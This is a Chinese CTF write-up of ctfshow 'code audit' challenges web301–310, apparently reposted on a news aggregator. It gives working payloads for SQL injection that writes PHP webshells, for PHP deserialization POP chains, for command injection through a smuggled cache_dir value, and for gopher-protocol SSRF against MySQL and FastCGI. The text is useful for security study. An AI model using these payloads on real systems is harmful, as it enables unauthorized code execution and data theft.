当前位置: 首页 > news >正文

WEB入门——代码审计

news 2026/6/12 20:51:24

web301

发现checklogin.php有未过滤的SQL语句

<?php
error_reporting(0);
session_start();
require 'conn.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){$_SESSION['error']="1";header("location:login.php");return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){$_SESSION['login']=1;$result->free();$mysqli->close();header("location:index.php");return;
}
$_SESSION['error']="1";
header("location:login.php");?>

注入点:

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

思路1:联合注入

账号:-1' union select 1#
密码:1

思路2:通过SQL注入漏洞写入shell,然后直接执行命令读取flag

账号:-1' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"#
密码:1

访问1.php

web302

修改的地方:

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){

只要sds_decode($userpwd)$row['sds_password']相等即可通过验证,翻找代码:

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>

思路1:联合注入,生成密码

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode("1");
?>

返回:

d9c77c4e454869d5d8da3b4be79694d3

账号:-1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#
密码:1

思路2:通过SQL注入漏洞写入shell,然后直接执行命令读取flag

账号:-1' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php"#
密码:1

访问1.php

web303

<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
if(strlen($username)>6){die();
}
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){$_SESSION['error']="1";header("location:login.php");return;
}
if(!strcasecmp(sds_decode($userpwd),string2: $row['sds_password'])){$_SESSION['login']=1;$result->free();$mysqli->close();header("location:index.php");return;
}
$_SESSION['error']="1";
header("location:login.php");?>

checklogin.php这次多了个限制,username长度不能大于6,之前代码不能用了
发现sds_user.sql里面存在用户信息

INSERT INTO `sds_user` VALUES ('1', 'admin', '27151b7b1ad51a38ea66b1529cde5ee4');

fun.php提示密码是admin

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode("admin");
?>

WEB入门——代码审计.png
查看dpt.php,发现dpt.phpdptadd.php都存在注入点

dpt.php

<?php
//注入点
$_GET['id']=!empty($_GET['id'])?$_GET['id']:NULL;
$page=$_GET['id'];	
$sql="select * from sds_dpt order by id;";
$result=$mysqli->query($sql);
?>

dptadd.php

<?php
session_start();
require 'conn.php';
if(!isset($_SESSION['login'])){
header("location:login.php");
return;
}else{//注入点$_POST['dpt_name']=!empty($_POST['dpt_name'])?$_POST['dpt_name']:NULL;$_POST['dpt_address']=!empty($_POST['dpt_address'])?$_POST['dpt_address']:NULL;$_POST['dpt_build_year']=!empty($_POST['dpt_build_year'])?$_POST['dpt_build_year']:NULL;$_POST['dpt_has_cert']=!empty($_POST['dpt_has_cert'])?$_POST['dpt_has_cert']:NULL;$_POST['dpt_cert_number']=!empty($_POST['dpt_cert_number'])?$_POST['dpt_cert_number']:NULL;$_POST['dpt_telephone_number']=!empty($_POST['dpt_telephone_number'])?$_POST['dpt_telephone_number']:NULL;$dpt_name=$_POST['dpt_name'];$dpt_address=$_POST['dpt_address'];$dpt_build_year=$_POST['dpt_build_year'];$dpt_has_cert=$_POST['dpt_has_cert']=="on"?"1":"0";$dpt_cert_number=$_POST['dpt_cert_number'];$dpt_telephone_number=$_POST['dpt_telephone_number'];$mysqli->query("set names utf-8");$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";$result=$mysqli->query($sql);echo $sql;if($result===true){$mysqli->close();header("location:dpt.php");}else{die(mysqli_error($mysqli));}
}
?>

dptadd.php下手

/dptadd.php

POST:

dpt_name=1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#

返回:

sds_dpt,sds_fl9g,sds_user

POST:

dpt_name=1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#

返回:

flag

POST:

dpt_name=1',sds_address=(select group_concat(flag) from sds_fl9g)#

返回:

ctfshow{88032351-c084-4403-9921-218c6c28811f}

web304

增加了全局waf

function sds_waf($str){return preg_match('/[0-9]|[a-z]|-/i', $str);
}

步骤跟上题一样,只不过表名从sds_fl9g改成了sds_flaag

dpt_name=1',sds_address=(select flag from sds_flaag)#

web305

fun.php

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){return false;}else{return true;}
}
?>

过滤很严格,且应用到了dptadd.php,因此之前的SQL注入行不通
WEB入门——代码审计-1.png
同时发现这题的checklogin.php相比web303多了个Cookie反序列化

<?php
error_reporting(0);
session_start();
require 'conn.php';
require 'fun.php';
require 'class.php';
$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){$user = unserialize($user_cookie);
}
$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:"";
$_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:"";
$username=$_POST['userid'];
if(strlen($username)>6){die();
}
$userpwd=$_POST['userpwd'];
$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){$_SESSION['error']="1";header("location:login.php");return;
}
if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){$_SESSION['login']=1;$result->free();$mysqli->close();header("location:index.php");return;
}
$_SESSION['error']="1";
header("location:login.php");?>

Cookie反序列化:

$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){$user = unserialize($user_cookie);
}

class.php

<?phpclass user{public $username;public $password;public function __construct($u,$p){$this->username=$u;$this->password=$p;}public function __destruct(){file_put_contents($this->username, $this->password);}
}

构造:

<?phpclass user{public $username;public $password;public function __construct(){$this->username='1.php';$this->password='<?php eval($_POST[1]);?>';}public function __destruct(){file_put_contents($this->username, $this->password);}}$a = new user();
echo urlencode(serialize($a));

返回:

O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D

WEB入门——代码审计-2.png
查看密码:
WEB入门——代码审计-4.png
连接数据库:
WEB入门——代码审计-3.png

web306

class.php有个文件写入操作

<?phpclass user{public $username;public $password;public function __construct($u,$p){$this->username=$u;$this->password=$p;}
}class dpt{public $name;public $address;public $build_year;public $have_cert="0";public $cert_num;public $phone;public function __construct($n,$a,$b,$h,$c,$p){$this->name=$n;$this->address=$a;$this->build_year=$b;$this->have_cert=$h;$this->cert_num=$c;$this->phone=$p;}
}
class log{public $title='log.txt';public $info='';public function loginfo($info){$this->info=$this->info.$info;}public function close(){file_put_contents($this->title, $this->info);}}

index.php发现反序列化代码

$user = unserialize(base64_decode($_COOKIE['user']));

dao.php中发现可利用的类

<?phprequire 'config.php';
require 'class.php';class dao{private $config;private $conn;public function __construct(){$this->config=new config();$this->init();}private function init(){$this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());}public function __destruct(){$this->conn->close();}public function get_user_password_by_username($u){$sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";$result=$this->conn->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);if($result->num_rows>0){return $row['sds_password'];}else{return '';}}
}

我们可以构造一个利用链执行反序列化操作

[index.php] unserialize -> [dao.php] dao::__destruct() -> [class.php] log::close()

<?phpclass dao{private $conn;public function __construct(){$this->conn=new log();}
}
class log{public $title;public $info;public function __construct(){$this->title='1.php';$this->info='<?php eval($_POST[1]);?>';}
}$a = new dao();
echo urlencode(base64_encode(serialize($a)));

路径:

/index.php

去里面看:

/flag.php

web307

WEB入门——代码审计-6.png
上题方法用不了
dao.php有个命令执行函数

<?phprequire 'config/config.php';
require 'class.php';class dao{private $config;private $conn;public function __construct(){$this->config=new config();$this->init();}private function init(){$this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());}public function __destruct(){$this->conn->close();}public function get_user_password_by_username($u){$sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";$result=$this->conn->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);if($result->num_rows>0){return $row['sds_password'];}else{return '';}}public function get_dpt_all(){$sql="select * from sds_dpt;";$result=$this->conn->query($sql);$dpt_array = array();if($result->num_rows>0){while($row=$result->fetch_array(MYSQLI_BOTH)){array_push($dpt_array, new dpt($row['id'],$row['sds_name'],$row['sds_address'],$row['sds_build_date'],$row['sds_have_safe_card'],$row['sds_safe_card_num'],$row['sds_telephone']));}}return $dpt_array;}public function insert_dpt($u,$a,$b,$h,$c,$p){$sql="insert INTO `sds_dpt` (`sds_name`, `sds_address`, `sds_build_date`, `sds_have_safe_card`, `sds_safe_card_num`, `sds_telephone`) VALUES ('$u', '$a', '$b', '$h', '$c', '$p');";$result=$this->conn->query($sql);return $result;}public function clearCache(){shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');}}

命令执行:

	public function  clearCache(){shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');}

config.php

<?phpclass config{private $mysql_username='root';private $mysql_password='phpcj';private $mysql_db='sds';private $mysql_port=3306;private $mysql_host='localhost';public $cache_dir = 'cache';public function get_mysql_username(){return $this->mysql_username;}public function get_mysql_password(){return $this->mysql_password;}public function get_mysql_port(){return $this->mysql_port;}public function get_mysql_db(){return $this->mysql_db;}public function get_mysql_host(){return $this->mysql_host;}
}

logout.php发现反序列化代码,且调用了clearCache()函数

<?php
session_start();
error_reporting(0);
require 'service/service.php';
unset($_SESSION['login']);
unset($_SESSION['error']);
setcookie('user','',0,'/');
$service = unserialize(base64_decode($_COOKIE['service']));
if($service){$service->clearCache();
}
setcookie('PHPSESSID','',0,'/');
setcookie('service','',0,'/');
header("location:../login.php");
?>

反序列化代码,调用了clearCache()函数

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){$service->clearCache();
}

POP链:

[/controller/logout.php] unserialize -> [/controller/service/dao/dao.php] dao::clearCache()

<?phpclass config{public $cache_dir = '1; echo "<?php eval(\$_POST[1]);?>" > 1.php;';
}
class dao{private $config;public function __construct(){$this->config=new config();}
}$a = new dao();
echo base64_encode(serialize($a));

路径:

/controller/logout.php

WEB入门——代码审计-5.png

蚁剑访问:

/controller/1.php

web308

dao.phpclearCache()函数加了过滤,只能匹配纯英文字符,因此上题的方法在这里行不通

	public function  clearCache(){if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');}}

解决:
发现index.php有反序列化代码,且调用了一个函数checkVersion()

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){$lastVersion=$service->checkVersion();
}
?>

dao.php

<?phprequire 'config/config.php';
require 'class.php';class dao{private $config;private $conn;public function __construct(){$this->config=new config();$this->init();}private function init(){$this->conn=new mysqli($this->config->get_mysql_host(),$this->config->get_mysql_username(),$this->config->get_mysql_password(),$this->config->get_mysql_db());}public function __destruct(){$this->conn->close();}public function get_user_password_by_username($u){$sql="select sds_password from sds_user where sds_username='".$u."' order by id limit 1;";$result=$this->conn->query($sql);$row=$result->fetch_array(MYSQLI_BOTH);if($result->num_rows>0){return $row['sds_password'];}else{return '';}}public function get_dpt_all(){$sql="select * from sds_dpt;";$result=$this->conn->query($sql);$dpt_array = array();if($result->num_rows>0){while($row=$result->fetch_array(MYSQLI_BOTH)){array_push($dpt_array, new dpt($row['id'],$row['sds_name'],$row['sds_address'],$row['sds_build_date'],$row['sds_have_safe_card'],$row['sds_safe_card_num'],$row['sds_telephone']));}}return $dpt_array;}public function insert_dpt($u,$a,$b,$h,$c,$p){$sql="insert INTO `sds_dpt` (`sds_name`, `sds_address`, `sds_build_date`, `sds_have_safe_card`, `sds_safe_card_num`, `sds_telephone`) VALUES ('$u', '$a', '$b', '$h', '$c', '$p');";$result=$this->conn->query($sql);return $result;}public function  clearCache(){if(preg_match('/^[a-z]+$/i', $this->config->cache_dir)){shell_exec('rm -rf ./'.$this->config->cache_dir.'/*');}}public function checkVersion(){return checkUpdate($this->config->update_url);}
}

重要代码:

	public function checkVersion(){return checkUpdate($this->config->update_url);}

config.php

<?phpclass config{private $mysql_username='root';private $mysql_password='';private $mysql_db='sds';private $mysql_port=3306;private $mysql_host='localhost';public $cache_dir = 'cache';public $update_url = 'https://vip.ctf.show/version.txt';public function get_mysql_username(){return $this->mysql_username;}public function get_mysql_password(){return $this->mysql_password;}public function get_mysql_port(){return $this->mysql_port;}public function get_mysql_db(){return $this->mysql_db;}public function get_mysql_host(){return $this->mysql_host;}
}

变量赋值:

public $update_url = 'https://vip.ctf.show/version.txt';

同时发现config.php里面并没有设置mysql密码

fun.php

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
function sds_waf($str){if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){return false;}else{return true;}
}
function checkUpdate($url){$ch=curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);$res = curl_exec($ch);curl_close($ch);return $res;}
?>

checkUpdate()函数通过cURL发起HTTP请求,因此突破口就是这里,我们可以通过这个打SSRF漏洞

index.php

$service = unserialize(base64_decode($_COOKIE['service']));
if($service){$lastVersion=$service->checkVersion();
}

利用链:

[index.php] unserialize -> [/controller/service/dao/dao.php] dao::checkVersion()

因此我们用Gopher协议打无密码的mysql,工具是Gopherus

python2 gopherus.py --exploit mysql

输入以下内容
数据库用户名:

root

待执行命令:

select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php";

WEB入门——代码审计-7.png

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%3b%01%00%00%00%01

<?phpclass dao{private $config;public function __construct(){$this->config=new config();}
}class config{public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%22%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%22%3b%01%00%00%00%01';
}$a = new dao();
echo base64_encode(serialize($a));

返回:

TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czo3NjM6ImdvcGhlcjovLzEyNy4wLjAuMTozMzA2L18lYTMlMDAlMDAlMDElODUlYTYlZmYlMDElMDAlMDAlMDAlMDElMjElMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlMDAlNzIlNmYlNmYlNzQlMDAlMDAlNmQlNzklNzMlNzElNmMlNWYlNmUlNjElNzQlNjklNzYlNjUlNWYlNzAlNjElNzMlNzMlNzclNmYlNzIlNjQlMDAlNjYlMDMlNWYlNmYlNzMlMDUlNGMlNjklNmUlNzUlNzglMGMlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNmUlNjElNmQlNjUlMDglNmMlNjklNjIlNmQlNzklNzMlNzElNmMlMDQlNWYlNzAlNjklNjQlMDUlMzIlMzclMzIlMzUlMzUlMGYlNWYlNjMlNmMlNjklNjUlNmUlNzQlNWYlNzYlNjUlNzIlNzMlNjklNmYlNmUlMDYlMzUlMmUlMzclMmUlMzIlMzIlMDklNWYlNzAlNmMlNjElNzQlNjYlNmYlNzIlNmQlMDYlNzglMzglMzYlNWYlMzYlMzQlMGMlNzAlNzIlNmYlNjclNzIlNjElNmQlNWYlNmUlNjElNmQlNjUlMDUlNmQlNzklNzMlNzElNmMlNDYlMDAlMDAlMDAlMDMlNzMlNjUlNmMlNjUlNjMlNzQlMjAlMjIlM2MlM2YlNzAlNjglNzAlMjAlNjUlNzYlNjElNmMlMjglMjQlNWYlNTAlNGYlNTMlNTQlNWIlMzElNWQlMjklM2IlM2YlM2UlMjIlMjAlNjklNmUlNzQlNmYlMjAlNmYlNzUlNzQlNjYlNjklNmMlNjUlMjAlMjIlMmYlNzYlNjElNzIlMmYlNzclNzclNzclMmYlNjglNzQlNmQlNmMlMmYlMzElMmUlNzAlNjglNzAlMjIlM2IlMDElMDAlMDAlMDAlMDEiO319

路径:

/index.php

WEB入门——代码审计-8.png
蚁剑连接:

/1.php

web309

题目提示mysql有密码了,因此上题打无密码msql的方法在这里用不了

可以用Gopher扫描端口试试

<?phpclass dao{private $config;public function __construct(){$this->config=new config();}
}class config{public $update_url = 'gopher://127.0.0.1:端口';
}$a = new dao();
echo base64_encode(serialize($a));

常见危险端口:

21 FTP
22 SSH
80 HTTP
443 HTTPS
3389 RDP
1433 MS-SQL Server
3306 MySQL
6379 Redis
9000 PHP-FPM / FastCGI

用Gopher请求端口时,如果端口有服务在监听,则会接受连接并等待我们传输数据,此时连接会“卡住”一段时间;如果端口没有服务,则会立刻拒绝连接。通过是否出现等待,就能判断端口是否开放
WEB入门——代码审计-9.png
方法跟之前一样,也是把结果写入Cookie,路径是/index.php,参数是service,扫描到9000的时候未响应,说明9000端口开放

TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMzoiZ29waGVyOi8vMTI3LjAuMC4xOjkwMDAiO319

用Gopher协议打FastCGI,工具也是Gopherus

python2 gopherus.py --exploit fastcgi

已知文件绝对路径:

/var/www/html/index.php

待执行命令:

echo "<?php eval(\$_POST[1]);?>" > 1.php

WEB入门——代码审计-10.png

gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH92%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%5C%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%201.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00

<?phpclass dao{private $config;public function __construct(){$this->config=new config();}
}class config{public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH92%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%5C%04%00%3C%3Fphp%20system%28%27echo%20%22%3C%3Fphp%20eval%28%5C%24_POST%5B1%5D%29%3B%3F%3E%22%20%3E%201.php%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00';
}$a = new dao();
echo base64_encode(serialize($a));

web310

方法和上题相同,也是用Gopher协议打FastCGI
flag在/var/flag目录

或者:试着读取nginx配置文件

<?phpclass dao{private $config;public function __construct(){$this->config=new config();}
}class config{public $update_url = 'file:///etc/nginx/nginx.conf';
}$a = new dao();
echo base64_encode(serialize($a));

返回:

daemon off;worker_processes  auto;error_log  /var/log/nginx/error.log warn;events {worker_connections  1024;
}http {include       /etc/nginx/mime.types;default_type  application/octet-stream;sendfile        on;keepalive_timeout  65;server {listen       80;server_name  localhost;root         /var/www/html;index index.php;proxy_set_header Host $host;proxy_set_header X-Real-IP $remote_addr;proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;location / {try_files $uri  $uri/ /index.php?$args;}location ~ \.php$ {try_files $uri =404;fastcgi_pass   127.0.0.1:9000;fastcgi_index  index.php;include        fastcgi_params;fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;}}server {listen       4476;server_name  localhost;root         /var/flag;index index.html;proxy_set_header Host $host;proxy_set_header X-Real-IP $remote_addr;proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;}
}

发现还监听着4476端口,通过http协议访问4476端口获取flag
server_name localhost; 只响应 Host 为 localhost 的请求

<?phpclass dao{private $config;public function __construct(){$this->config=new config();}
}class config{public $update_url = 'http://127.0.0.1:4476';
}$a = new dao();
echo base64_encode(serialize($a));

方法依旧

http://www.jsqmd.com/news/1000972/

相关文章:

  • WinCC V7.x免编译C脚本实现用户登录登出与权限分级控制
  • 2026年儿童英语启蒙工具深度评测:科学适配学情的启蒙新选择
  • 3步精通Acode插件系统:打造移动端专业开发环境
  • 2026年6月南明区优质的汽车美容授权店推荐几家,汽车隔热膜/汽车玻璃膜/家具贴膜/隐形车衣,汽车美容公司哪家靠谱 - 品牌推荐师
  • QT排故流程记录
  • 2026粤港澳大湾区青少年军旅夏令营综合实力TOP5 权威评测榜单 - 13425704091
  • 汽车安全MCU设计解析:MPC5643L锁步冗余与功能安全架构实践
  • 破解AI获客困境:GEO引擎网站双引擎三层增长方法论如何实现三重增长? - 速递信息
  • 2026品牌羽绒服贴牌加工厂最新推荐:权威测评发布 优质代工企业解读 - 速递信息
  • 2026武汉名表回收哪家好?正规机构推荐 - 奢侈品回收测评
  • 全国跨城寄件一站式解决方案,全国低价寄件手机快递搬家物流轻点下单,足不出户坐等师傅上门 - 时讯资讯
  • Mermaid Live Editor:免费在线实时图表编辑器的完整解决方案
  • 基于魔珐星云打造的游戏策划师数字人:游戏设计、剧情策划、语音随时交互
  • 喜马拉雅下载器终极指南:3步实现VIP音频永久本地存储
  • 2026武汉圣罗兰回收:五个常见套路+四个正规辨别标准 - 奢侈品回收测评
  • 生成式AI的社会影响与风险应对策略
  • 如何用智慧职教学习助手3步告别手动刷课:完整自动化解决方案
  • macos支持的视频去重软件?5款Mac剪辑横评实测
  • 深入剖析经典通信DSP MSC7119:架构、外设与实战优化
  • Snap.Hutao:开源原神工具箱如何帮你节省60%游戏管理时间
  • 【单片机复习笔记】51单片机核心寄存器与中断系统总结
  • MCF5272嵌入式通信处理器:架构解析与工业网关应用实践
  • WEB入门——反序列化
  • 5分钟掌握终极HTML转Word工具:html-to-docx完全指南
  • 温州闲置奢品二手包钻石首饰上门回收靠谱吗?本地7家优质门店全解析 2026实时行情 - 速递信息
  • HCS08 CPU核心深度解析:寻址模式、中断处理与指令集优化实战
  • 营收增长42%:品牌羽绒服贴牌加工厂哪家好? - 速递信息
  • 深入解析MC9S08SH8 ADC模块:从寄存器配置到低功耗实战
  • WEB入门——SSRF
  • 终极Windows 10 OneDrive卸载指南:三步告别系统卡顿与空间占用